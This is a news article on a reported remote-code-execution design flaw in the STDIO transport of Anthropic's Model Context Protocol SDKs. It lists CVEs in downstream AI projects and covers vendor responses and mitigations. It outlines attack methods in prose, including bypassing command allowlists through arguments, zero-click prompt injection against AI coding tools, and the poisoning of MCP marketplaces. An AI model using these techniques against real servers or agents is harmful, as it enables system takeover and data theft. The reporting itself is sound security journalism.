Anthropic's Model Context Protocol flaw threatens 200,000 servers with complete takeover

3 Sources

Share

Security researchers from Ox have identified a critical architectural design flaw in Anthropic's Model Context Protocol that exposes over 200,000 servers to remote code execution attacks. The vulnerability affects software packages totaling more than 150 million downloads across Python, TypeScript, Java, and Rust implementations. Despite repeated requests to patch the root issue, Anthropic maintains the protocol's behavior is 'expected.'

Critical Security Vulnerability Discovered in Anthropic's Protocol

A fundamental security vulnerability in Anthropic's Model Context Protocol (MCP) has put as many as 200,000 servers at risk of complete takeover, according to Ox Security researchers. The issue stems from what the research team describes as an MCP design flaw rather than a simple coding error—an architectural design decision baked into the official SDK across Python, TypeScript, Java, and Rust

1

. The vulnerability enables remote code execution (RCE) on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories

2

.

Source: Hacker News

Source: Hacker News

The Ox research team, comprising Moshe Siman Tov Bustan, Mustafa Naamnih, Nir Zadok, and Roni Bar, says they repeatedly asked Anthropic to patch the root issue but were told the protocol works as intended. The company declined to modify the protocol's architecture, citing the behavior as 'expected'

1

. This decision has significant implications for the AI supply chain, as any developer using Anthropic's official MCP software development kit inherits this vulnerability across any supported language

2

.

Understanding the STDIO Transport Mechanism Flaw

The root cause lies in how MCP uses STDIO (standard input/output) as a local transport mechanism for AI applications to spawn an MCP server as a subprocess. While this code was designed to start a local STDIO server and return a handle to the LLM, in practice it allows anyone to run arbitrary OS commands

1

. When given a command that successfully creates an STDIO server, it returns the handle, but when given a different command, it returns an error after the command is executed

2

.

This architectural flaw affects more than 7,000 publicly accessible servers and software packages totaling more than 150 million downloads

2

. The vulnerability has cascading effects across the AI ecosystem because MCP serves as a standard that lets AI tools connect to external data sources and applications—a vital component used by OpenAI, DeepMind, and Anthropic's own Claude apps

3

.

Four Attack Vectors Threaten AI Infrastructure

Ox researchers identified four distinct vulnerability types that abuse this logic. The first involves unauthenticated and authenticated command injection, allowing attackers to enter user-controlled commands that run directly on the server without authentication or sanitization, potentially leading to complete server takeover

1

. Vulnerable projects include all versions of LangFlow, IBM's open source low-code framework for building AI applications, and GPT Researcher, which has been assigned CVE-2025-65720

1

.

The second attack vector enables unauthenticated command injection with hardening bypass, allowing attackers to circumvent protections implemented by developers. Both Upsonic (CVE-2026-30625) and Flowise (CVE-2026-40933) had hardened against command injection by allowing only certain commands like 'python,' 'npm,' and 'npx,' but researchers bypassed this by indirectly injecting commands via allowed command arguments

1

. The third vulnerability type allows zero-click prompt injection across AI integrated development environments including Windsurf (CVE-2026-30615), Claude Code, Cursor, Gemini-CLI, and GitHub Copilot, though vendors including Google, Microsoft, and Anthropic said this was either a known issue or not a valid security vulnerability

1

.

Supply Chain Implications and Industry Response

The research began in November 2025 and included more than 30 responsible disclosure processes, resulting in 10 high- and critical-severity CVE designations so far

1

. Affected projects include LiteLLM (CVE-2026-30623), Agent Zero (CVE-2026-30624), Fay Framework (CVE-2026-30618), Bisheng (CVE-2026-33224), Langchain-Chatchat (CVE-2026-30617), and DocsGPT (CVE-2026-26015), among others

2

. While some vendors have issued patches, the shortcoming remains unaddressed in Anthropic's MCP reference implementation, causing developers to continue inheriting the code execution risks

2

.

Ox researchers also successfully poisoned nine out of 11 MCP marketplaces with a proof-of-concept that runs a command generating an empty file. The marketplaces that accepted their submission include platforms with hundreds of thousands of monthly visitors, meaning a single malicious MCP entry could be installed by thousands of developers before detection

1

. A week after the initial report to Anthropic, the AI vendor quietly released an updated security policy stating that MCP adapters, specifically STDIO ones, should be used with caution—a change the research team says 'didn't fix anything'

1

.

What makes this a supply chain event rather than a single CVE is that one architectural decision, made once, propagated silently into every language, every downstream library, and every project that trusted the protocol. Ox Security emphasizes that shifting responsibility to implementers does not transfer the risk—it just obscures who created it

2

. To counter the threat, experts recommend blocking public IP access to sensitive services, monitoring MCP tool invocations, running MCP-enabled services in a sandbox, treating external MCP configuration input as untrusted, and only installing MCP servers from verified sources

2

. Anthropic did not respond to inquiries about the issue

1

.

Source: TechRadar

Source: TechRadar

Today's Top Stories

TheOutpost.ai

Your Daily Dose of Curated AI News

Don’t drown in AI news. We cut through the noise - filtering, ranking and summarizing the most important AI news, breakthroughs and research daily. Spend less time searching for the latest in AI and get straight to action.

© 2026 Triveous Technologies Private Limited
Instagram logo
LinkedIn logo